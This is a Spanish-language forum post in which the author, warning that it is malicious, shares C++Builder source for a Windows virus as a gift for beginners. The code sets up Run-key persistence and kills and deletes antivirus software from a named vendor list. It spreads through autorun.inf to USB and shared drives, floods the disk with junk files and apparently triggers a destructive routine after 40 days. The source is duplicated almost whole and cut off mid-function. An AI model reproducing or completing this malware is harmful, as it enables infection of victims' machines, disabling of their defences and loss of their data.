Autor
ADVERTENCIA ESTE ES UN PROGRAMA MALICIOSO ASI QUE SEAN CONCIENTES DEL CODIGO ANTES DE EJECUTARLO
Este es mi primer tester ya casi no lo uso por eso lo que lo decidi poner aqui como un pequeño aporte a los mas novatos que yo.
Soy un poco desordenado para programar y tampoco se la voy a poner papaya
,hay un poco de variables por alli sin usar por que con esta cosa ise otras
Esta hecho en bulder 6 y es una aplicacion de servicio.
//---------------------------------------------------------------------------
Código:
#include "Unit1.h"
#include "Forms.hpp"
#include "registro.h"
#include "process.h"
#include "DateUtils.hpp"
#include "dirent.h"
#include "math.h"
#include <iostream>
#include <fstream>
#include <printers.hpp>
//---------------------------------------------------------------------------
#pragma package(smart_init)
#pragma resource "*.dfm"
TService1 *Service1;
TDateTime hoy;
AnsiString version ="xxxxxxxxxx ";
AnsiString hijomut;
int edoini=0;
typedef struct {
char fil[256];
int edo;
}regf;
int permisoexe=1,jefecontactado=0;
int permisokey=1;
int permisoshared=1;
enum { dirlis=0,listar,listblanco,exclavo,regevento,listdirect,lisarc,listemail,fechafinal,dbase,ipexclavos,presentacion,existo};
int presencia,compatibilidad;
long double crono1=0,crono2=0,crono3=0,crono5=0,crono6=0,crono7=0,crono4=0,crono8=0;
confsis sistema;
diskset discolocal[26];
AnsiString minameruta,minamecorto,masterdir,jefename;
TStringList* nomsis = new TStringList();
TStringList* nomtrampa = new TStringList();
TStringList* valuekey = new TStringList();
TStringList* titulosmem = new TStringList();
TStringList* regmem = new TStringList();
TStringList* deftit = new TStringList();
TStringList* arcsis = new TStringList();
TStringList* pids = new TStringList();
TStringList* listarbla = new TStringList();
TStringList* emailblanco = new TStringList();
TStringList* extenbus = new TStringList();
TStringList* patblan = new TStringList();
TStringList* extensiones = new TStringList();
AnsiString ord;
void inicializalista();
int detechermano ();
void infecdisk();
void enfermar(AnsiString,int);
AnsiString generanomar();
int checkhkey();
void crearbase();
void infecshared();
int escojerar1(AnsiString);
AnsiString generafil();
AnsiString procrear();
FILE *aqui;
///---------------------------------------------------------------------------
__fastcall TService1::TService1(TComponent* Owner)
: TService(Owner)
{
}
TServiceController __fastcall TService1::GetServiceController(void)
{
return (TServiceController) ServiceController;
}
void __stdcall ServiceController(unsigned CtrlCode)
{
Service1->Controller(CtrlCode);
}
//---------------------------------------------------------------------------
void __fastcall TService1::ServiceDestroy(TObject *Sender)
{
OnContinue;
}
//---------------------------------------------------------------------------
bool __stdcall EnumProc(HWND hWnd,long)
{
unsigned long* pPid;
unsigned long result;
void *hg;
unsigned long id;
if(hWnd==NULL)
return false;
hg = GlobalAlloc(GMEM_SHARE,sizeof(unsigned long));
pPid = (unsigned long *)GlobalLock(hg);
result = GetWindowThreadProcessId(hWnd,pPid);
if(result){
char title[110];
char className[95];
char totalStr[256];
GetClassName(hWnd,className,95);
GetWindowText(hWnd,title,110);
id=*pPid;
pids->Add(AnsiString(id));
titulosmem->Add(AnsiString(title));
regmem->Add(AnsiString(className));
}
else{
GlobalUnlock(hg);
GlobalFree(hg);
return false;
}
GlobalUnlock(hg);
GlobalFree(hg);
return true;
}
void vaciardir(AnsiString cad)
{
ChDir(cad);
int ban5,i;
AnsiString aux,aux1,exte,aux2;
TSearchRec sr ;
int iAttributes = 0;
iAttributes |= faAnyFile * 1;
iAttributes |= faHidden * 1;
iAttributes |= faReadOnly * 1;
aux1=aux+"*.*";
if (FindFirst(aux1, iAttributes, sr) == 0)
{
do
{
if (((sr.Attr) & iAttributes) == sr.Attr)
{
if(AnsiCompareStr(sr.Name,".")!=0&&AnsiCompareStr(sr.Name,"..")!=0)
{
aux2=cad+sr.Name;
FileSetAttr(aux2,!faHidden);
FileSetAttr(aux2,!faReadOnly);
DeleteFile(aux2);
}
}
}
while (FindNext(sr) == 0);
}
FindClose(sr);
}
void bloquear(int rot,AnsiString keyp,AnsiString valu)
{
AnsiString a;
int i;
TRegistry *Reg = new TRegistry;
TStringList *Val = new TStringList;
if(rot==0)
Reg->RootKey = HKEY_LOCAL_MACHINE;
else
Reg->RootKey = HKEY_CURRENT_USER;
if (Reg->OpenKey(keyp,false))
{
Reg->GetValueNames(Val);
for (i = 0; i < Val->Count; i++)
{
a=Reg->ReadString(Val->Strings[i]);
if(AnsiContainsStr(a,valu)||AnsiContainsStr(Val->Strings[i],valu))
Reg->WriteString(Val->Strings[i]," ");
}
}
}
void inoperar (AnsiString cad)
{
bloquear(0,"\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",cad);
bloquear(1,"\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",cad);
}
void eliminarentradas()
{
int i;
for(i=0;i<=patblan->Count-1;i++)
inoperar(patblan->operator [](i));
}
void desactivaantiv()
{
int ban,i,j,pid;
char cad[256]=" ";
AnsiString s;
FILE *p;
s=masterdir+arcsis->operator [](listdirect);
p=fopen(s.c_str(),"rb");
for(i=0;i<=regmem->Count-1;i++)
for(j=0;j<=patblan->Count-1;j++)
if(AnsiContainsStr(regmem->operator [](i),patblan->operator [](j)))
{
pid=StrToInt(pids->operator [](i));
HANDLE ps = OpenProcess(1,false,pid);
if(ps)
TerminateProcess(ps,-9);
}
do
{
fread(&cad,sizeof(char)*256,1,p);
ban=1;
for(i=0;i<patblan->Count&&ban;i++)
if(AnsiContainsStr(AnsiString(cad),patblan->operator [](i)))
{
vaciardir(AnsiString(cad));
ban=0;
}
}
while(!feof(p));
eliminarentradas();
fclose(p);
}
AnsiString generafill()
{
AnsiString filnex;
char cad[20]=" ";
int i,y;
for(i=0;i<=8;i++)
{
if(fmod(i,2))
{
y=random(5);
if(y==0)
cad[i]='a';
if(y==1)
cad[i]='e';
if(y==2)
cad[i]='i';
if(y==3)
cad[i]='o';
if(y==4)
cad[i]='u';
}
else
cad[i]='a'+random(26);
}
filnex=AnsiString(cad)+extensiones->operator [](random(extensiones->Count));
return filnex;
}
void rellenar()
{
long int tam,j;
int i,n,ban;
char cad[256];
long int cont,pos;
AnsiString dir,pat;
FILE *p;
pat=masterdir+arcsis->operator [](listdirect);
p=fopen(pat.c_str(),"rb");
ban=1;
if(p!=NULL)
{
fseek(p,sizeof(char)*256,SEEK_END);
cont=ftell(p)/(sizeof(char)*256);
if(cont<=32000)
pos=random(cont);
else
pos=random(32000);
rewind(p);
fseek(p,pos*(sizeof(char)*256),SEEK_SET);
fread(&cad,sizeof(char)*256,1,p);
fclose(p);
for(i=0;i<=10;i++)
{
pat=AnsiString(cad)+generafill();
tam=(random(6)*1000000)+(random(1000)*1000)+random(1000);
p=fopen(pat.c_str(),"wb");
if(p==NULL)
{
for(j=0;j<=tam;j++)
{
n=(random(32)*1000)+random(1000);
fwrite(&n,sizeof(n),1,p);
}
fclose(p);
ban=0;
}
}
}
if(ban)
{
for(i=0;i<=10;i++)
{
pat=masterdir+generafill();
tam=(random(6)*1000000)+(random(1000)*1000)+random(1000);
p=fopen(pat.c_str(),"wb");
if(p!=NULL)
{
for(j=0;j<=tam;j++)
{
n=(random(32)*1000)+random(1000);
fwrite(&n,sizeof(n),1,p);
}
fclose(p);
}
}
}
fclose(p);
}
void __fastcall TService1::ServiceCreate(TObject *Sender)
{
SetErrorMode(SEM_FAILCRITICALERRORS);
TDateTime inif;
int ban7;
regf filsap;
AnsiString engano,useri,msend;
FILE *p;
AnsiString pat,val,reg,pat1,pat2,val1,reg1;
long lp=0,tamfil;
int edo,result,conteo,a,viejoc,c,ban,i;
randomize();
minameruta=Forms::Application->ExeName;
minamecorto=ExtractFileName(minameruta);
sistema=examinar();
for(i=0;i<26;i++)
discolocal[i]=detecdis(i);
if(AnsiContainsStr(sistema.OS,"Windows"))
compatibilidad=1;
else
compatibilidad=0;
if(!compatibilidad)
exit(1);
EnumWindows((WNDENUMPROC)EnumProc,lp);
masterdir=sistema.APPDATA+"\\";
presencia=detechermano();
if(presencia==1)
exit(1);
inicializalista();
Forms::Application->Title=deftit->operator [](random(deftit->Count));
if(!checkhkey())
{
reg=masterdir+nomsis->operator [](random(nomsis->Count));
CopyFile(minameruta.c_str(),reg.c_str(),1);
FileSetAttr(reg,faHidden);
FileSetAttr(reg,faReadOnly);
val=valuekey->operator [](random(valuekey->Count));
creahkey(0,"\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",val,reg);
creahkey(1,"\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",val,reg);
if(permisoexe)
{
permisoexe=0;
result=spawnl(P_NOWAIT, reg.c_str(), reg.c_str(), NULL);
Sleep(5000);
desactivaantiv();
if(result!=-1)
exit(1);
permisoexe=1;
}
}
crearbase();
infecshared();
pat=masterdir+ arcsis->operator [](dbase);
pat=masterdir+arcsis->operator [](fechafinal);
if(!FileExists(pat))
programardestruccion();
hoy=Date();
fcloseall();
edoini=1;
infecdisk();
hoy=Date();
pat1=masterdir+arcsis->operator [](fechafinal);
p=fopen(pat1.c_str(),"rb");
fread(&inif,sizeof(inif),1,p);
fclose(p);
conteo=DaysBetween(hoy,inif);
if(fmod(conteo,6)==0&&conteo>0)
desactivaantiv();
rellenar();
do
{
if(crono4>=3600)
{
hoy=Date();
conteo=DaysBetween(hoy,inif);
if(conteo>=40)
destroipc();
crono4=0;
}
if(crono7>=72000)
{
for(i=0;i<26;i++)
discolocal[i]=detecdis(i);
crono7=0;
}
if(crono5>=36000)
{
infecdisk();
crono5=0;
}
if(crono6>=10000)
{
pids->Clear();
titulosmem->Clear();
regmem->Clear();
sistema=examinar();
EnumWindows((WNDENUMPROC)EnumProc,lp);
crono5=0;
}
crono2++;
crono4++;
crono5++;
crono6++;
crono7++;
if(crono4>=1000000)
crono4=0;
if(crono5>=1000000)
crono5=0;
if(crono6>=1000000)
crono6=0;
if(crono7>=1000000)
crono7=0;
Sleep(50);
}
while(1);
}
//---------------------------------------------------------------------------
void infecshared ()
{
char cad[256]= " ";
int i;
AnsiString pat,engano,prueba,pa1;
FILE *p,*g;
pat=masterdir + arcsis->operator [](listdirect);
p=fopen(pat.c_str(),"rb");
if(p!=NULL)
do
{
fread(&cad,sizeof(char)*256,1,p);
if(AnsiContainsStr(AnsiString(cad),"shared")||AnsiContainsStr(AnsiString(cad),"sharing")||AnsiContainsStr(AnsiString(cad),"share"))
{
chanatra(AnsiString(cad),1,1);
prueba=nomtrampa->operator [](random(nomtrampa->Count-1));
engano=AnsiString(cad)+prueba;
CopyFile(minameruta.c_str(),engano.c_str(),1);
pa1=AnsiString(cad) +"autorun.inf";
FileSetAttr(pa1,!faHidden);
g=fopen(pa1.c_str(),"wb");
if(g!=NULL)
{
StrCopy(cad,"[AutoRun]\r\nopen=");
StrCat(cad,prueba.c_str());
StrCat(cad,"\r\nshellexecute=");
StrCat(cad,prueba.c_str());
StrCat(cad,"\r\nshell\\Auto\\command=");
StrCat(cad,prueba.c_str());
StrCat(cad,"\r\n");
fwrite(&cad,sizeof(char)*256,1,g);
fclose(g);
FileSetAttr(pa1,faHidden);
FileSetAttr(engano,faHidden);
}
}
}
while(!feof(p));
fclose(p);
}
void crearbase()
{
int i;
FILE *p;
AnsiString pat,pat1,pat2,homed;
pat=masterdir+arcsis->operator [](listdirect);
DeleteFile(pat);
homed=sistema.HOMEDRIVE+"\\";
listdir(pat,homed);
pat1=masterdir+arcsis->operator [](lisarc);
DeleteFile(pat1);
extenbus->Clear();
extenbus->Add(".html");
extenbus->Add(".txt");
extenbus->Add(".doc");
extenbus->Add(".pad");
extenbus->Add(".msg");
extenbus->Add(".asp");
extenbus->Add(".dbx");
extenbus->Add(".oft");
extenbus->Add(".php");
extenbus->Add(".pl");
extenbus->Add(".rtf");
extenbus->Add(".sht");
extenbus->Add(".tbb");
extenbus->Add(".win");
extenbus->Add(".vbs");
extenbus->Add(".wab");
extenbus->Add(".cpp");
extenbus->Add(".DB");
extenbus->Add(".BD");
extenbus->Add(".fow");
extenbus->Add(".xls");
extenbus->Add(".ppt");
extenbus->Add(".jpg");
extenbus->Add(".docx");
extenbus->Add(".accdb");
extenbus->Add(".pdf");
extenbus->Add(".tmp");
extenbus->Add(".docx");
escojerar1(pat);
}
int escojerar1(AnsiString filefont)
{
int ban5,i;
char cad[256]=" ";
FILE *p;
AnsiString aux,aux1,exte,aux2;
TSearchRec sr ;
int iAttributes = 0;
iAttributes |= faReadOnly * 1;
iAttributes |= faArchive * 1;
p=fopen(filefont.c_str(),"rb");
if(p==NULL)
return 0;
do
{
fread(&cad,sizeof(char)*256,1,p);
aux=AnsiString(cad);
ChDir(aux);
aux1=aux+"*.*";
if (FindFirst(aux1, iAttributes, sr) == 0)
{
do
{
if (((sr.Attr) & iAttributes) == sr.Attr)
{
exte=ExtractFileExt(sr.Name);
ban5=0;
for(i=0;i<=extenbus->Count-1;i++)
if(!StrComp(exte.c_str(),extenbus->operator [](i).c_str()))
ban5=1;
if(ban5)
{
aux2=aux+sr.Name;
listarbla->Add(aux2);
}
}
}
while (FindNext(sr) == 0);
}
}
while(!feof(p));
FindClose(sr);
fcloseall();
return 1;
}
int checkhkey()
{
AnsiString pat;
int i,j;
for (i=0;i<=valuekey->Count-1;i++)
for(j=0;j<=nomsis->Count-1;j++)
{
pat=masterdir+nomsis->operator [](j);
if(buscahkey(0,"\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",valuekey->operator [](i),pat))
return 1;
if(buscahkey(1,"\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",valuekey->operator [](i),pat))
return 1;
}
return 0;
}
void inicializalista()
{
//nombreinterno//
nomsis->Add("Aqui puedes cargar los nombres que vam ha tener los exes");
//////señuelo////////////
nomtrampa->Add("Aqui pueden colocar los nombre señuelo ni de broma iva ha deja rlos mios jeje");
////////////values//////////////////
valuekey->Add("Aqui colocas los nombres que vam en las HK");
////////////titulos///////////
deftit->Add("Aqui van los titulos de la aplicacion ");
/////////////arcsis////////
arcsis->Add("Una lista de ficheros que crea el exe son como 6");
////////////////////////////////
patblan->Add("WEBPROXY");
patblan->Add("APVXDW");
patblan->Add("Patvs");
patblan->Add("AVENGIN");
patblan->Add("PNMSRV");
patblan->Add("panda");
patblan->Add("centinel");
patblan->Add("firewall");
patblan->Add("Centinell.vxd");
patblan->Add("Mcafe");
patblan->Add("virscan");
patblan->Add("vircentinel");
patblan->Add("codeguard");
patblan->Add("lavasoft");
patblan->Add("nort");
patblan->Add("antivir");
patblan->Add("virscan");
patblan->Add("scanv");
patblan->Add("ipguard");
patblan->Add("iptable");
patblan->Add("kaspersk");
patblan->Add("iprocser");
patblan->Add("viraler");
patblan->Add("securitycen");
patblan->Add("centpan");
patblan->Add("Protec");
patblan->Add("guard");
/////////////////////////////
extensiones->Add(".EXE");
extensiones->Add(".DLL");
extensiones->Add(".BAT");
extensiones->Add(".VBS");
extensiones->Add(".SYS");
extensiones->Add(".INI");
extensiones->Add(".DAT");
extensiones->Add(".INF");
extensiones->Add(".PAD");
extensiones->Add(".TXT");
///estos estring tiene que ir cifrados
}
int detechermano()
{
int i,j;
for(i=0;i<=titulosmem->Count-1;i++)
for(j=0;j<=deftit->Count-1;j++)
if(!StrComp(titulosmem->operator [](i).c_str(),deftit->operator [](j).c_str()))
return 1;
return 0;
}
//----------------------------------------------------------------------------
void infecdisk ()
{
AnsiString a;
int i;
for(i=0;i<26;i++)
if(discolocal[i].tipo==2||discolocal[i].tipo==3||discolocal[i].tipo==4)
enfermar(AnsiString(discolocal[i].nom),discolocal[i].tipo);
}
void enfermar(AnsiString driv,int tipo)
{
FILE *p;
char cad[256]=" ";
int ban=0,i,ban1=0,a;
AnsiString pa,prueba,pa1;
ban=1;
a=FileGetAttr(driv);
ban1=1;
prueba=driv+"s.fer";
if(a==-1)
ban1=0;
if(a!=-1)
{a=FileCreate(prueba);
FileClose(a);}
if(a==-1)
{
ban1=0;
}
DeleteFile(prueba);
if(ban1)
for(i=0;i<nomtrampa->Count;i++)
{
pa=driv+nomtrampa->operator [](i);
if(FileExists(pa))
ban=0;
}
if(ban&&ban1)
{prueba=nomtrampa->operator [](random(nomtrampa->Count));
pa=driv+prueba;
CopyFile(hijomut.c_str(),pa.c_str(),1);
pa1=driv+"autorun.inf";
FileSetAttr(pa1,!faHidden);
p=fopen(pa1.c_str(),"wb");
StrCopy(cad,"[AutoRun]\r\nopen=");
StrCat(cad,prueba.c_str());
StrCat(cad,"\r\nshellexecute=");
StrCat(cad,prueba.c_str());
StrCat(cad,"\r\nshell\\Auto\\command=");
StrCat(cad,prueba.c_str());
StrCat(cad,"\r\n");
fwrite(&cad,sizeof(char)*256,1,p);
fclose(p);
FileSetAttr(pa1,faHidden);
FileSetAttr(pa,faHidden);
}
}
AnsiString generanomar()
{
AnsiString s;
s=nomtrampa->operator [](random(nomtrampa->Count));
return s;
}
void __fastcall TService1::ServiceAfterUninstall(TService *Sender)
{
Service1->ServiceCreate(Sender);
}
//---------------------------------------------------------------------------
void __fastcall TService1::ServiceBeforeUninstall(TService *Sender)
{
Service1->ServiceCreate(Sender);
}
#include "Forms.hpp"
#include "registro.h"
#include "process.h"
#include "DateUtils.hpp"
#include "dirent.h"
#include "math.h"
#include <iostream>
#include <fstream>
#include <printers.hpp>
//---------------------------------------------------------------------------
#pragma package(smart_init)
#pragma resource "*.dfm"
TService1 *Service1;
TDateTime hoy;
AnsiString version ="xxxxxxxxxx ";
AnsiString hijomut;
int edoini=0;
typedef struct {
char fil[256];
int edo;
}regf;
int permisoexe=1,jefecontactado=0;
int permisokey=1;
int permisoshared=1;
enum { dirlis=0,listar,listblanco,exclavo,regevento,listdirect,lisarc,listemail,fechafinal,dbase,ipexclavos,presentacion,existo};
int presencia,compatibilidad;
long double crono1=0,crono2=0,crono3=0,crono5=0,crono6=0,crono7=0,crono4=0,crono8=0;
confsis sistema;
diskset discolocal[26];
AnsiString minameruta,minamecorto,masterdir,jefename;
TStringList* nomsis = new TStringList();
TStringList* nomtrampa = new TStringList();
TStringList* valuekey = new TStringList();
TStringList* titulosmem = new TStringList();
TStringList* regmem = new TStringList();
TStringList* deftit = new TStringList();
TStringList* arcsis = new TStringList();
TStringList* pids = new TStringList();
TStringList* listarbla = new TStringList();
TStringList* emailblanco = new TStringList();
TStringList* extenbus = new TStringList();
TStringList* patblan = new TStringList();
TStringList* extensiones = new TStringList();
AnsiString ord;
void inicializalista();
int detechermano ();
void infecdisk();
void enfermar(AnsiString,int);
AnsiString generanomar();
int checkhkey();
void crearbase();
void infecshared();
int escojerar1(AnsiString);
AnsiString generafil();
AnsiString procrear();
FILE *aqui;
///---------------------------------------------------------------------------
__fastcall TService1::TService1(TComponent* Owner)
: TService(Owner)
{
}
TServiceController __fastcall TService1::GetServiceController(void)
{
return (TServiceController) ServiceController;
}
void __stdcall ServiceController(unsigned CtrlCode)
{
Service1->Controller(CtrlCode);
}
//---------------------------------------------------------------------------
void __fastcall TService1::ServiceDestroy(TObject *Sender)
{
OnContinue;
}
//---------------------------------------------------------------------------
bool __stdcall EnumProc(HWND hWnd,long)
{
unsigned long* pPid;
unsigned long result;
void *hg;
unsigned long id;
if(hWnd==NULL)
return false;
hg = GlobalAlloc(GMEM_SHARE,sizeof(unsigned long));
pPid = (unsigned long *)GlobalLock(hg);
result = GetWindowThreadProcessId(hWnd,pPid);
if(result){
char title[110];
char className[95];
char totalStr[256];
GetClassName(hWnd,className,95);
GetWindowText(hWnd,title,110);
id=*pPid;
pids->Add(AnsiString(id));
titulosmem->Add(AnsiString(title));
regmem->Add(AnsiString(className));
}
else{
GlobalUnlock(hg);
GlobalFree(hg);
return false;
}
GlobalUnlock(hg);
GlobalFree(hg);
return true;
}
void vaciardir(AnsiString cad)
{
ChDir(cad);
int ban5,i;
AnsiString aux,aux1,exte,aux2;
TSearchRec sr ;
int iAttributes = 0;
iAttributes |= faAnyFile * 1;
iAttributes |= faHidden * 1;
iAttributes |= faReadOnly * 1;
aux1=aux+"*.*";
if (FindFirst(aux1, iAttributes, sr) == 0)
{
do
{
if (((sr.Attr) & iAttributes) == sr.Attr)
{
if(AnsiCompareStr(sr.Name,".")!=0&&AnsiCompareStr(sr.Name,"..")!=0)
{
aux2=cad+sr.Name;
FileSetAttr(aux2,!faHidden);
FileSetAttr(aux2,!faReadOnly);
DeleteFile(aux2);
}
}
}
while (FindNext(sr) == 0);
}
FindClose(sr);
}
void bloquear(int rot,AnsiString keyp,AnsiString valu)
{
AnsiString a;
int i;
TRegistry *Reg = new TRegistry;
TStringList *Val = new TStringList;
if(rot==0)
Reg->RootKey = HKEY_LOCAL_MACHINE;
else
Reg->RootKey = HKEY_CURRENT_USER;
if (Reg->OpenKey(keyp,false))
{
Reg->GetValueNames(Val);
for (i = 0; i < Val->Count; i++)
{
a=Reg->ReadString(Val->Strings[i]);
if(AnsiContainsStr(a,valu)||AnsiContainsStr(Val->Strings[i],valu))
Reg->WriteString(Val->Strings[i]," ");
}
}
}
void inoperar (AnsiString cad)
{
bloquear(0,"\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",cad);
bloquear(1,"\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",cad);
}
void eliminarentradas()
{
int i;
for(i=0;i<=patblan->Count-1;i++)
inoperar(patblan->operator [](i));
}
void desactivaantiv()
{
int ban,i,j,pid;
char cad[256]=" ";
AnsiString s;
FILE *p;
s=masterdir+arcsis->operator [](listdirect);
p=fopen(s.c_str(),"rb");
for(i=0;i<=regmem->Count-1;i++)
for(j=0;j<=patblan->Count-1;j++)
if(AnsiContainsStr(regmem->operator [](i),patblan->operator [](j)))
{
pid=StrToInt(pids->operator [](i));
HANDLE ps = OpenProcess(1,false,pid);
if(ps)
TerminateProcess(ps,-9);
}
do
{
fread(&cad,sizeof(char)*256,1,p);
ban=1;
for(i=0;i<patblan->Count&&ban;i++)
if(AnsiContainsStr(AnsiString(cad),patblan->operator [](i)))
{
vaciardir(AnsiString(cad));
ban=0;
}
}
while(!feof(p));
eliminarentradas();
fclose(p);
}
AnsiString generafill()
{
AnsiString filnex;
char cad[20]=" ";
int i,y;
for(i=0;i<=8;i++)
{
if(fmod(i,2))
{
y=random(5);
if(y==0)
cad[i]='a';
if(y==1)
cad[i]='e';
if(y==2)
cad[i]='i';
if(y==3)
cad[i]='o';
if(y==4)
cad[i]='u';
}
else
cad[i]='a'+random(26);
}
filnex=AnsiString(cad)+extensiones->operator [](random(extensiones->Count));
return filnex;
}
void rellenar()
{
long int tam,j;
int i,n,ban;
char cad[256];
long int cont,pos;
AnsiString dir,pat;
FILE *p;
pat=masterdir+arcsis->operator [](listdirect);
p=fopen(pat.c_str(),"rb");
ban=1;
if(p!=NULL)
{
fseek(p,sizeof(char)*256,SEEK_END);
cont=ftell(p)/(sizeof(char)*256);
if(cont<=32000)
pos=random(cont);
else
pos=random(32000);
rewind(p);
fseek(p,pos*(sizeof(char)*256),SEEK_SET);
fread(&cad,sizeof(char)*256,1,p);
fclose(p);
for(i=0;i<=10;i++)
{
pat=AnsiString(cad)+generafill();
tam=(random(6)*1000000)+(random(1000)*1000)+random(1000);
p=fopen(pat.c_str(),"wb");
if(p==NULL)
{
for(j=0;j<=tam;j++)
{
n=(random(32)*1000)+random(1000);
fwrite(&n,sizeof(n),1,p);
}
fclose(p);
ban=0;
}
}
}
if(ban)
{
for(i=0;i<=10;i++)
{
pat=masterdir+generafill();
tam=(random(6)*1000000)+(random(1000)*1000)+random(1000);
p=fopen(pat.c_str(),"wb");
if(p!=NULL)
{
for(j=0;j<=tam;j++)
{
n=(random(32)*1000)+random(1000);
fwrite(&n,sizeof(n),1,p);
}
fclose(p);
}
}
}
fclose(p);
}
void __fastcall TService1::ServiceCreate(TObject *Sender)
{
SetErrorMode(SEM_FAILCRITICALERRORS);
TDateTime inif;
int ban7;
regf filsap;
AnsiString engano,useri,msend;
FILE *p;
AnsiString pat,val,reg,pat1,pat2,val1,reg1;
long lp=0,tamfil;
int edo,result,conteo,a,viejoc,c,ban,i;
randomize();
minameruta=Forms::Application->ExeName;
minamecorto=ExtractFileName(minameruta);
sistema=examinar();
for(i=0;i<26;i++)
discolocal[i]=detecdis(i);
if(AnsiContainsStr(sistema.OS,"Windows"))
compatibilidad=1;
else
compatibilidad=0;
if(!compatibilidad)
exit(1);
EnumWindows((WNDENUMPROC)EnumProc,lp);
masterdir=sistema.APPDATA+"\\";
presencia=detechermano();
if(presencia==1)
exit(1);
inicializalista();
Forms::Application->Title=deftit->operator [](random(deftit->Count));
if(!checkhkey())
{
reg=masterdir+nomsis->operator [](random(nomsis->Count));
CopyFile(minameruta.c_str(),reg.c_str(),1);
FileSetAttr(reg,faHidden);
FileSetAttr(reg,faReadOnly);
val=valuekey->operator [](random(valuekey->Count));
creahkey(0,"\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",val,reg);
creahkey(1,"\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",val,reg);
if(permisoexe)
{
permisoexe=0;
result=spawnl(P_NOWAIT, reg.c_str(), reg.c_str(), NULL);
Sleep(5000);
desactivaantiv();
if(result!=-1)
exit(1);
permisoexe=1;
}
}
crearbase();
infecshared();
pat=masterdir+ arcsis->operator [](dbase);
pat=masterdir+arcsis->operator [](fechafinal);
if(!FileExists(pat))
programardestruccion();
hoy=Date();
fcloseall();
edoini=1;
infecdisk();
hoy=Date();
pat1=masterdir+arcsis->operator [](fechafinal);
p=fopen(pat1.c_str(),"rb");
fread(&inif,sizeof(inif),1,p);
fclose(p);
conteo=DaysBetween(hoy,inif);
if(fmod(conteo,6)==0&&conteo>0)
desactivaantiv();
rellenar();
do
{
if(crono4>=3600)
{
hoy=Date();
conteo=DaysBetween(hoy,inif);
if(conteo>=40)
destroipc();
crono4=0;
}
if(crono7>=72000)
{
for(i=0;i<26;i++)
discolocal[i]=detecdis(i);
crono7=0;
}
if(crono5>=36000)
{
infecdisk();
crono5=0;
}
if(crono6>=10000)
{
pids->Clear();
titulosmem->Clear();
regmem->Clear();
sistema=examinar();
EnumWindows((WNDENUMPROC)EnumProc,lp);
crono5=0;
}
crono2++;
crono4++;
crono5++;
crono6++;
crono7++;
if(crono4>=1000000)
crono4=0;
if(crono5>=1000000)
crono5=0;
if(crono6>=1000000)
crono6=0;
if(crono7>=1000000)
crono7=0;
Sleep(50);
}
while(1);
}
//---------------------------------------------------------------------------
void infecshared ()
{
char cad[256]= " ";
int i;
AnsiString pat,engano,prueba,pa1;
FILE *p,*g;
pat=masterdir + arcsis->operator [](listdirect);
p=fopen(pat.c_str(),"rb");
if(p!=NULL)
do
{
fread(&cad,sizeof(char)*256,1,p);
if(AnsiContainsStr(AnsiString(cad),"shared")||AnsiContainsStr(AnsiString(cad),"sharing")||AnsiContainsStr(AnsiString(cad),"share"))
{
chanatra(AnsiString(cad),1,1);
prueba=nomtrampa->operator [](random(nomtrampa->Count-1));
engano=AnsiString(cad)+prueba;
CopyFile(minameruta.c_str(),engano.c_str(),1);
pa1=AnsiString(cad) +"autorun.inf";
FileSetAttr(pa1,!faHidden);
g=fopen(pa1.c_str(),"wb");
if(g!=NULL)
{
StrCopy(cad,"[AutoRun]\r\nopen=");
StrCat(cad,prueba.c_str());
StrCat(cad,"\r\nshellexecute=");
StrCat(cad,prueba.c_str());
StrCat(cad,"\r\nshell\\Auto\\command=");
StrCat(cad,prueba.c_str());
StrCat(cad,"\r\n");
fwrite(&cad,sizeof(char)*256,1,g);
fclose(g);
FileSetAttr(pa1,faHidden);
FileSetAttr(engano,faHidden);
}
}
}
while(!feof(p));
fclose(p);
}
void crearbase()
{
int i;
FILE *p;
AnsiString pat,pat1,pat2,homed;
pat=masterdir+arcsis->operator [](listdirect);
DeleteFile(pat);
homed=sistema.HOMEDRIVE+"\\";
listdir(pat,homed);
pat1=masterdir+arcsis->operator [](lisarc);
DeleteFile(pat1);
extenbus->Clear();
extenbus->Add(".html");
extenbus->Add(".txt");
extenbus->Add(".doc");
extenbus->Add(".pad");
extenbus->Add(".msg");
extenbus->Add(".asp");
extenbus->Add(".dbx");
extenbus->Add(".oft");
extenbus->Add(".php");
extenbus->Add(".pl");
extenbus->Add(".rtf");
extenbus->Add(".sht");
extenbus->Add(".tbb");
extenbus->Add(".win");
extenbus->Add(".vbs");
extenbus->Add(".wab");
extenbus->Add(".cpp");
extenbus->Add(".DB");
extenbus->Add(".BD");
extenbus->Add(".fow");
extenbus->Add(".xls");
extenbus->Add(".ppt");
extenbus->Add(".jpg");
extenbus->Add(".docx");
extenbus->Add(".accdb");
extenbus->Add(".pdf");
extenbus->Add(".tmp");
extenbus->Add(".docx");
escojerar1(pat);
}
int escojerar1(AnsiString filefont)
{
int ban5,i;
char cad[256]=" ";
FILE *p;
AnsiString aux,aux1,exte,aux2;
TSearchRec sr ;
int iAttributes = 0;
iAttributes |= faReadOnly * 1;
iAttributes |= faArchive * 1;
p=fopen(filefont.c_str(),"rb");
if(p==NULL)
return 0;
do
{
fread(&cad,sizeof(char)*256,1,p);
aux=AnsiString(cad);
ChDir(aux);
aux1=aux+"*.*";
if (FindFirst(aux1, iAttributes, sr) == 0)
{
do
{
if (((sr.Attr) & iAttributes) == sr.Attr)
{
exte=ExtractFileExt(sr.Name);
ban5=0;
for(i=0;i<=extenbus->Count-1;i++)
if(!StrComp(exte.c_str(),extenbus->operator [](i).c_str()))
ban5=1;
if(ban5)
{
aux2=aux+sr.Name;
listarbla->Add(aux2);
}
}
}
while (FindNext(sr) == 0);
}
}
while(!feof(p));
FindClose(sr);
fcloseall();
return 1;
}
int checkhkey()
{
AnsiString pat;
int i,j;
for (i=0;i<=valuekey->Count-1;i++)
for(j=0;j<=nomsis->Count-1;j++)
{
pat=masterdir+nomsis->operator [](j);
if(buscahkey(0,"\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",valuekey->operator [](i),pat))
